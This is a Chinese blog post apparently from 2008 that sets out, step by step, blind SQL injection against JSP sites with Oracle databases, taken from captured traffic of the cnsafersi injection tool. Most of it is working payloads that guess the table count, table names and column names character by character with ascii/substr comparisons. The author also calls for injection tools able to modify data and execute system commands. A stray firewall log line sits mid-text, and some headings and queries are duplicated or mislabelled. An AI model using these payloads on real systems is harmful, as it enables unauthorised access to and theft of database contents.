Chinaunix首页 | 论坛 | 博客

BSD爱好者乐园jxtm.blog.chinaunix.net

首页 |  博文目录 |  关于我

剑心通明

  • 博客访问: 18672963
  • 博文数量: 7460
  • 博客积分: 10434
  • 博客等级: 上将
  • 技术积分: 78178
  • 用 户 组: 普通用户
  • 注册时间: 2008-03-02 22:54
文章分类

全部博文(7460)

文章存档

2011年(1)

2009年(669)

2008年(6790)

我的朋友
最近访客
推荐博文
相关博文
JSP+ORACLE注入方法整理v1.0

分类: 系统运维

2008-05-31 16:55:56

首先感谢华仔和他的朋友Hotkey为大家开发的cnsafersi 注入工具,没有这个工具就没有本文,HEHE,本文是对cnsafersi 注入工具抓包后所获得的数据进行了分析和整理,文章写的比较仓促,有不足之处欢迎同行指正。另外希望有高手开发出功能更加强大的JSP注入程序,cnsafersi目前仅有select的功能,建议新的JSP注入工具中能加入insert/delete/update/backup/上传/执行系统命令等功能,可以参考NBSI的功能进行开发。参考文章:《如何开发CnSaferSI》。

首先介绍本文中所使用的工具之JSP注入利器:华仔和他的朋友Hotkey开发的cnsafersi,关于使用方法近期我会写一个详细的使用教程:

下面以上图中的AD表为例来说明JSP+ORACLE注入的过程:

1、 判断注入类型(数字型还是字符型)

字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)

 And user>char(0)

 And user
 And user>char(0) And '1'='1

 And user
) And user
 And str(98)>str(97)

 And str(98) And str(98)>str(97) And '1'='1 

 And str(98)
 And str(98)
) And str(98)


出现正常的页面:

And USER>CHR(0)

And USER
2、 猜解表数量和表名

数据库数量为3:

And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) And UNISTR(1)>UNISTR(0)


以下为猜解数据表数量

数据表第一位为:1

And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))



数据表第二位为:3

And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))


数据表第三位为:1
And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))



共有131个数据表,见上图。

以下为猜解表名称:

以下为判断第一个表的长度为:2

And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)



以下为判断第一个表的第一位值为:A

And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))



以下为判断第一个表AD的第二位值为:D

And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))



以下为判断第二个表的表ADER的表名长度为:4

And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)



以下为判断第二个表ADER第一位的值为:A

And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))



以下为判断第二个表ADER第二位的值为:D
And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))



以下为判断第二个表ADER第三位的值为:E
And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))



以下为判断第二个表ADER第四位的值为:R

And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

以下为判断第三个表的表名长度为:

And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)



3、 猜解列名长度和列名:

a) 以下为猜解字段长度为:2位

And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)



 列名长度为:10位以上

以下猜解列名的长度的第一位为:1(十位)

And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))



以下猜解列名长度的第二位为:0(个位)
And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

Informational 10/12/2005 15:03:25 Suspect event: ICMP Time Exceeded (> 1 for 1 seconds)

And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))



 以下为猜解第一列的第一个字段名CLASS的长度为:5

And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)



 以下为猜解第一列第一个字段的第一位为:C

And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))



 以下为猜解第一列第一个字段的第一位为:L

And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

